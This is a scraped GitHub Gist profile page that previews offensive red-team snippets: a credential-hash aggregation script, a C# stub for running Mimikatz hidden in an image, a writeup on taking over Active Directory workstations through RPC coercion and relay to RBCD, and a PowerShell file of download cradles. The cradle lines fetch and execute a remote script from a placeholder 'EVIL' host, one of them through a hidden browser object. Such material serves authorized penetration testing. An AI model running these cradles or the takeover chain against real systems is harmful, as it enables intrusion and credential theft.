Skip to content

Instantly share code, notes, and snippets.

D4rkz3rO /
Created Sep 24, 2021 — forked from seajaysec/
Parses output from CrackMapExec, CrackMapExtreme, Responder, PCredz, and into aggregate files of hashes and plaintext output
# This script assumes Responder is in /opt/Responder
# Error messages begone!
exec 2>/dev/null
# Hardcoded location for script output files
# Hardcoded location for ntlmrelayx's .sam file output directory
D4rkz3rO / skullkatz.cs
Created Sep 1, 2021
SkullKatz - Execute Mimikatz from an image
View skullkatz.cs
using System;
using System.IO;
using System.Net;
using System.Text;
using System.IO.Compression;
using System.Collections.Generic;
using System.Configuration.Install;
using System.Runtime.InteropServices;
D4rkz3rO /
Created Jul 26, 2021 — forked from gladiatx0r/
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure


In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

View DownloadCradles.ps1
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object
### Keybase proof
I hereby claim:
* I am d4rkz3ro on github.
* I am sageyev ( on keybase.
* I have a public key ASDnFT5MR4aJjCgaAVnamCtGsr0hwBiHFyUmTWyxqeDaZgo
To claim this, I am signing this object: